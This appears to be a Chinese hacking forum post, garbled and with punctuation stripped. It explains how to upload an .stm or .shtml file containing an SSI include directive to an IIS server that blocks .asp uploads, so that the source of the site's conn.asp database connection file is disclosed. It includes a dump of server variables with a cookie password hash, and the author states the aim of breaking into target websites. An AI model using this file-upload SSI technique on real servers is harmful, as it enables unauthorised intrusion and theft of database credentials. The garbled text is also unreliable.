利用stm来上传还能执行程序代码说保存为stm或者shtml看看运行如下:
HTTP_ACCEPT:image/gif image/xxbitmap image/jpeg
image/pjpeg application/xshockwaveflash
application/vndmspowerpoint
application/vndmsexcel application/msword
*/* HTTP_ACCEPT_LANGUAGE:zhcn HTTP_CONNECTION:KeepAlive
HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/
(compatible; MSIE ; Windows NT ; Maxthon; NET CLR )
HTTP_COOKIE:nbblastactivity=; bblastvisit=;
bblastactivity=; bbuserid=;
bbpassword=fdedeaafbaafcf;
ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ
HTTP_ACCEPT_ENCODING:gzip deflate 当前文件名称:F:Webstm
Web服务器的名称和版本:MicrosoftIIS/主机名:localhost端口:客户或客户代理IP地址:客户或客户代理主机名:PATH_INFO 的值但带有扩展为某个目录规范的虚拟路径:F:Webstm客户端给出附加路径信息:/stmimage/gif image/xxbitmap image/jpeg image/pjpeg application/xshockwaveflash application/vndmspowerpoint application/vndmsexcel application/msword */*
Quoted from Unkown:
当网站不允许上传asp cer cdx htr等文件时 上传一个stm文件 内容为:
<!#include file=connasp>
直接请求这个stm文件 connasp就一览无遗 数据库路径也就到手啦原来就是如上所说的
<!#include file=connasp>
就是一条SSI指令其作用是将的内容拷贝到当前的页面中当访问者来浏览时会看到其它HTML文档一样显示其中的内容我在本地试验成功!在我的iis目录下建了一个teststm文件内容为
<!#include file=connasp>
又在同一目录下放了一个我的一个木马文件okasp在浏览器中请求teststm没有什么反映一片空白但是一查看源代码狂晕原来就是我的asp文件的内容!这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径但是一个前提是服务器的对stm或者shtml的扩展没有删除!